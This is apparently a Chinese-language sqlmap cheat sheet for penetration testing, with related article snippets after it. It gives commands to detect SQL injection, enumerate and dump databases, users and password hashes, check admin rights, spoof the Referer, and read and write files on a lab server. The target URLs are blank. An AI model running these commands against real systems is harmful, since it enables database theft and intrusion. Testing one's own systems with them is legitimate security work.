##python sqlmap.py開頭的是在windows中執行sqlmap時使用的;
##sqlmap開頭的是在kali中執行sqlmap時使用的
#判斷是否存在注入:
python sqlmap.py -u ""
sqlmap -u ""
#注入點後面的引數大於等於2個時:
python sqlmap.py -u "&uid=2"
sqlmap -u "&uid=2"
#判斷文字中的請求是否存在注入:
python sqlmap.py -r 文字路徑 #例如:python sqlmap.py -r desktop/1.txt
sqlmap -r 文字路徑 #例如:sqlmap -r desktop/1.txt
#查詢當前使用者下的所有資料庫:
python sqlmap.py -u "" --dbs
sqlmap -u "" --dbs
#獲取資料庫中的表名:
python sqlmap.py -u "" -d 庫名 --tables
sqlmap -u "" -d 庫名 --tables
#獲取表中的欄位名:
python sqlmap.py -u "" -d 庫名 -t 表名 --columns
sqlmap -u "" -d 庫名 -t 表名 --columns
#獲取字段內容:
python sqlmap.py -u "" -d 庫名 -t 表名 -c 欄位1,欄位2…… --dump
sqlmap -u "" -d 庫名 -t 表名 -c 欄位1,欄位2…… --dump
#獲取資料庫的所有使用者:
python sqlmap.py -u "" --users
sqlmap -u "" --users
#獲取資料庫使用者的密碼:
python sqlmap.py -u "" --passwords
sqlmap -u "" --passwords
#獲取當前**資料庫的名稱:
python sqlmap.py -u "" --current-db
sqlmap -u "" --current-db
#獲取當前**資料庫的使用者名稱:
python sqlmap.py -u "" --current-user
sqlmap -u "" --current-user
#注:末尾新增 --batch 掃瞄過程中會自動選擇預設選項,例如詢問是否使用等級1的方式掃瞄,預設是使用,新增該選項時就不用手動按回車確認。
#檢視當前使用者是不是資料庫管理員賬戶:
python sqlmap.py -u "" --is-dba
sqlmap -u "" --is-dba
#注:結果**現:currnet user is dba: ture 就表示是管理員賬戶
#列出資料庫管理員角色:
python sqlmap.py -u "" --roles
sqlmap -u -u "" --roles
#傳送請求時偽造http中的referer(表示請求是從**發出的,通常用於偽造和欺騙)
python sqlmap.py -u "" --referer
sqlmap -u "" --referer
#注:命令表示傳送請求時,欺騙對方,告知對方請求是從www.baidu.com傳送出來的
#從資料庫伺服器中讀取檔案:
python sqlmap.py -u "" --file-read "c:/wamp/test.txt" -v 1
sqlmap -u "" --file-read "c:/wamp/test.txt" -v 1
#注:wamp環境使用的是win7系統,在進行如上命令操作時,需提前在靶場系統內建立好所要讀取的檔案,所以提前在c:/wamp/目錄下建立好test.txt,並寫入隨機內容即可。
#上傳檔案到資料庫伺服器中:
python sqlmap.py -u "" --file-write /root/1.txt --file-dest "c:/wamp/2.txt" -v 1
sqlmap -u "" --file-write /root/1.txt --file-dest "c:/wamp/2.txt" -v 1
#注:操作環境為kali,提前在/root/目錄下建立乙個檔案1.txt並寫入一定內容,然後將該檔案上傳到伺服器的c:/wamp/目錄下,並修改名稱為2.txt
滲透測試工具之sqlmap
滲透測試是一種利用模擬黑客攻擊的方式來評估計算機網路系統安全效能的方法。滲透測試工具很多,其中sqlmap 是乙個開源的滲透測試工具,可以用來進行自動化的檢測,利用sql注入漏洞,獲取資料庫伺服器的許可權。它具有功能強大的檢測引擎,針對各種不同型別資料庫的滲透測試的功能選項,包括獲取資料庫中儲存的資...
滲透測試工具之sqlmap
在這個資料有價的時代資料庫安全已經成為了重中之重,於是就整理了一下最常用的一款 反正我上大學的時候它還是蠻流行的.資料庫安全方面的滲透測試工具sqlmap的使用筆記。sqlmap是乙個自動化的sql注入滲透工具,指紋檢測 注入方式 注入成功後的取資料等等都是自動化的,甚至還提供了乙個字典來將取回來的...
Web滲透之Web利器合集 sqlmap使用手冊
os cmd sql shell 8.讀取伺服器指定檔案 9.更新 u指定注入點url r 指定檔案 dbs跑庫名 d指定資料庫 tables跑錶名 t指定表 columns跑字段 c指定字段 dump跑資料 敏感指令 count檢視資料量 cookie注入 cookie id 66 level 2...